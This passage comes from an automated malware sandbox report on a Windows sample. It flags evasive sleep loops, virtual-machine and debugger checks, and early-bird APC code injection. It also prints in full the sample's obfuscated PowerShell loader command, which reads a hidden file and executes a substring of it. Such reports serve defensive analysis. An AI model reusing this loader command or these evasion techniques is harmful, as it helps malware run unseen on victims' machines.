Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599342 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599016 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598759 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598654 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598542 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598427 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595966 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595808 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595694 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595577 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594469 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6677 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2986 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Window / User API: threadDelayed 1559 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Window / User API: threadDelayed 8297 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe API coverage: 2.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 964 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -28592453314249787s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220 Thread sleep count: 1559 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220 Thread sleep count: 8297 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599342s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598759s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598654s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598542s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598427s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598093s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597766s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597328s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596766s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596438s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596313s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595966s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595808s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595694s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595577s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594469s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040290B FindFirstFileW, 11_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040683D FindFirstFileW,FindClose, 11_2_0040683D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599342 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599016 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598759 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598654 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598542 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598427 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598093 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597328 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596438 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596094 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595966 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595808 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595694 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595577 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594469 Jump to behavior
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\jr
Source: ModuleAnalysisCache.1.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\jr
Source: ModuleAnalysisCache.1.dr Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\jr
Source: svchost.exe, 00000004.00000002.2252344812.000002527EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251666504.0000025204455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251618487.0000025204441000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00401C43 LdrInitializeThunk,LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW, 11_2_00401C43
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Nonalined.exe Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Nonalined.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Nonalined.exe base: 16C0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe" Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_70A01096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree, 0_2_70A01096
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
